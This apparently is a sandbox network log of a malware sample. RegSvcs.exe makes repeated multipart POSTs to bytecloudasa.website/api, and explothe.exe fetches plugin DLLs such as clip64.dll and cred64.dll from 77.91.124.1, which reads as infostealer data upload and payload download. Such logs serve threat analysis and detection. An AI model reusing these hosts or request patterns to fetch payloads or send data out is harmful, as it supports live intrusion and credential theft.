Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=f07e4s0jMOW5qFNGKqkdDd88q5DTyoe87rTTgi9SRcM9BwaOg%2Bq%2BsW%2FsUzYl3akEvPEoTrSZqdXBaC4B%2FabJrDyK%2BCAs%2F65RM8Le4iZPZYeEV98TZTFYoFetPCc0KJ4izv9RNp6jqA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 81409fae6fb006c6-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=0bof097rhpl2mcdsbi4jkdf9vt; expires=Sat, 03 Feb 2024 11:22:46 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:07 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=52K4ye4OQkxkqY7sefsZ04sB%2B7wQo%2BOFZBeEwuHR07L0qrC5CRBfgTIcZwWjBzDx6O0HT8XzEN3lBPc%2Fs%2F9CbnsYCcxn0L6TtC4Hm%2FoZvtz70JfRL%2Fl7QGbm2Q2%2FsQ7S%2FNqYvi3qMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 81409fb15dff1c1d-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=ommkod5nf777ccpv2m9np0u6um; expires=Sat, 03 Feb 2024 11:22:48 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:09 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YiJ2lMNGikPcUfIYFLfR%2FZr0jcC9MdsNbUuk0XMEuCVqzHh16oj0LQ3WGQEdnOtVZfqPLs8offOjWN1B3krOJmFHJBYlECauwc3R1mRwWmyVZoETkny3esmYzpebbN4ooGTLU4TTOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 81409fb2cacc6614-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=bldvgdh82bbdnu9j08l8luqti9; expires=Sat, 03 Feb 2024 11:22:49 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:10 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FSG%2FuI25APX53kSoeWA1ZYmrFHyQncR7e1DP%2BcbkG%2BwAv%2FMISqdEgVTe1yjVIzCDzgU9bKkC4S2LuA%2FmRmhAkylXZHV%2FuDe%2BdEoX9rS8RP1evlJPgz%2F9oqINdrKIC%2BoK5R08QQqKBg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 81409fbb5b0e65f1-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=qqf5kssidnqm82r3lad65gml8a; expires=Sat, 03 Feb 2024 11:22:52 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:13 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uGmlo2zeA2u5AEtGo3m3HMVGQq3M5wsnYt6WW3sUDbRlWa5ih3G7x%2BQ5GpBOYsFkU9u1Nrn0fR%2FRgi%2BqOker4XTcKULHrvA%2FRW160EOP1MpGRxoUPuurpShAbaEqExSBT30tX9URWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 81409fc53b106578-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=g6bpvlu0pekdm7rm2l1f9mrcsa; expires=Sat, 03 Feb 2024 11:22:52 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:13 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k7SVLZUNGOAVwy7YFg3HR%2B7VQ%2BopTraxP%2FbXZmGXU3IgkNTQ0wWOvki%2FFbeWw26zMTdDXKLl67eVhTkG6lC5nWFByFzYwZ6rpBoqc30YbWbRCShkypS5BIJxoiUq5yLembb8Wgv6BA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 81409fd70eaf1c1d-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=cbqcvi5qngoikt7u0p5e2jbfhd; expires=Sat, 03 Feb 2024 11:22:53 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:14 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BHMOeUvbTRRMmR6Q%2FHsI8PvVF%2FkXuNPfyqAidLkNrCb0Kh2Hwpk%2F5643tHDwWEsHDmBNhln%2B6fwrQArVvW1AVY1QZa5%2BEcDEeDg656xxlvkrmnwWKLlqdEaKDhzqFbRC3DKkTyTxOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 81409fd7cb2606dc-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=j60oddo0c89a1d1bslcluit9d1; expires=Sat, 03 Feb 2024 11:22:54 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:15 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8tSf1wj0sjWVfgD145s0%2FDDKBi8TbiBpNvR3CNSK4Ffn%2BJtM%2BUj66DpN7u4G6jB%2FZw6BdCTfbxab9yVYf0TX%2BJwKAuEsTQbTvwwuURilzYBBPHKimEODnCBxpTcCqpnF6tHzq0MqEg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 81409fda196fb91a-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=tdu15vv53ajhi6au1ena36qdre; expires=Sat, 03 Feb 2024 11:22:54 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:15 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QHJfJsFFZDyHqHVHhNQawqXOdLbK9h1Tt3esiNUdXQm5tSuZTPGbGHgsd4zH4jMBwg5MqbVwy9FSJQfLbiYpjVI3fBBu8T6DtzNgEWlcWoYnzofw6TUEvHDZZPreClwvJzcEkUrafA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 81409fe13e030e34-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=4dnvhvq0nie835rj62166dop4a; expires=Sat, 03 Feb 2024 11:22:54 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:15 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ceEOcKp40GXEkuX5%2FxNj4lvWkSXD%2Bysjv3y9bpJofwgh1ouN2U28gei%2BDz6ETS7IETa3qyMkhfiXpO30MhKjWYudFmVg9AmQHTICPQKPP8gPpcYWuWQt7vfb0DwlyHESQnXekEAFaw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 81409fe1fd60b930-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 16139
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=31v9u3lm0dj2bq247j6e66cokg; expires=Sat, 03 Feb 2024 11:22:55 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:16 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GZkxpmzPHuGRFPkh2RAvRpLbh6yh%2F%2Be84bolPIosxIqMwooeK2feqYDKwedlhApMFujgBCRSnt8N815O71W3qRt99Tm6Yq0rCGkkU8kugK7806QeCkBPgCLO0DSDK5BrdlHJm1AnEQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 81409fe77ea36602-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=oin6nvqar73b2urdq3mt5dtfu2; expires=Sat, 03 Feb 2024 11:22:57 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:18 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=twHmIOsSVI3W5%2Bh1xbTORsQH0pY7jmpzh%2Fw6SC%2FJvdYKraFQsDTeAoFXjA%2BjoALMVbMZi7N1ah5lJpmp0XOac1L3d%2FXohFnv8xbt9xAOPMckrprclxk3yCs28%2FyUZqfXBiCsDseufw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 81409ff08cbe65f0-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=ds3gd7qj1btmtbavp1203qlntg; expires=Sat, 03 Feb 2024 11:22:57 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:18 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IN9TjCBwa28tmVx1Q3%2F%2FTENJEyCS1pWGmaAE7VRX%2B2Jh4RnW8ONm0eRPcsNralYLxnNiCHh%2B5HwwCOkcZM2uVbMae7BsNfMP6t34DI4BzWgG%2BI18ndJpOZo3%2BOZvJ7UnUYH6D1TYGw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 81409ff12cb80bb9-AMS
GET

http://77.91.124.1/theme/Plugins/cred64.dll

explothe.exe

Remote address:

77.91.124.1:80

Request

GET /theme/Plugins/cred64.dll HTTP/1.1
Host: 77.91.124.1

Response

HTTP/1.1 404 Not Found

Date: Tue, 10 Oct 2023 17:36:18 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 273
Content-Type: text/html; charset=iso-8859-1
GET

http://77.91.124.1/theme/Plugins/clip64.dll

explothe.exe

Remote address:

77.91.124.1:80

Request

GET /theme/Plugins/clip64.dll HTTP/1.1
Host: 77.91.124.1

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:18 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 30 Sep 2023 10:50:50 GMT
ETag: "16400-60691507c5cc0"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=9tn8dumkisr135tnd4dvlok4t2; expires=Sat, 03 Feb 2024 11:22:57 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:18 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZbjcjNZ1RqqEfWuErl%2BghVhezI5CbReLHnIF9uRwCBOe1mMqMFmwsRWnGzvKlCRyrxDwUhxl99Kh246%2Fy3PKjTLO6W1ZCR2UtaBICfHLFH9DGB4aIgtjfr%2F9SKfRRzSGrzF%2B0svbrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 81409ff5ec8e656d-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=on3oagsp8sr2qbd0phg6daf2di; expires=Sat, 03 Feb 2024 11:22:58 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:19 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dkwnqAm7SOJ0ERE3tRTr7s%2FybEHIFJv%2FDgHw0rYYZK6vKRDlqYY6yMfW%2F89crbfD1TEl%2BF7Ay2xb3dLm7qApTtct6ddAt1gkZXlSqNtdLA%2FCcTp52y1Oo1EIZwbUzwFJeNkt20zmtQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 81409ff68bb65c43-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
